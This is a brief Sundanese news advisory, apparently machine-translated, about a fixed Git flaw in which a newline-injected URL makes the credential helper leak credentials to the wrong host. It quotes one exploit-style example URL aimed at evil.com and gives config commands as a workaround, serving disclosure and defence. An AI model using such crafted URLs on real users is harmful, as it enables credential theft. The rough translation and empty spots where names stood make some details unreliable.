release corrective sahiji sistem kontrol sumber disebarkeun Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 jeung 2.17.4, di nu ngaleungitkeun () dina panangan"", anu nyababkeun kredensial dikirim ka host anu salah nalika klien git ngaksés gudang nganggo URL formatna khusus anu ngandung karakter baris anyar. Kerentanan tiasa dianggo pikeun ngatur kredensial ti host anu sanés pikeun dikirim ka server anu dikontrol ku panyerang.
Nalika netepkeun URL sapertos "https://evil.com?%0ahost=github.com/", pawang kredensial nalika nyambungkeun kana host evil.com bakal ngalangkungan parameter auténtikasi anu ditetepkeun pikeun github.com. Masalah lumangsung nalika ngajalankeun operasi kayaning "git clone", kaasup ngolah URL pikeun submodules (contona, "git submodule update" otomatis bakal ngolah URL dieusian dina file .gitmodules ti Repository nu). Kerentanan anu paling bahaya dina kaayaan dimana pamekar clone gudang tanpa ningali URL, contona, nalika gawé bareng submodules, atawa dina sistem anu ngalakukeun tindakan otomatis, contona, dina Aksara ngawangun pakét.
Pikeun meungpeuk vulnerabilities dina versi anyar ngalirkeun karakter garis anyar dina sagala nilai dikirimkeun ngaliwatan protokol bursa credential. Pikeun distribusi, anjeun tiasa ngalacak sékrési apdet pakét dina halaman , , , , , , .
Salaku workaround pikeun meungpeuk masalah Entong nganggo credential.helper nalika ngaksés repositori umum sareng entong nganggo "git clone" dina modeu "--recurse-submodules" sareng repositori anu henteu dicentang. Pikeun nganonaktipkeun lengkep credential.helper Handler, nu teu jeung retrieving kecap akses ti , ditangtayungan atanapi file sareng kecap akses, anjeun tiasa nganggo paréntah:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
sumber: opennet.ru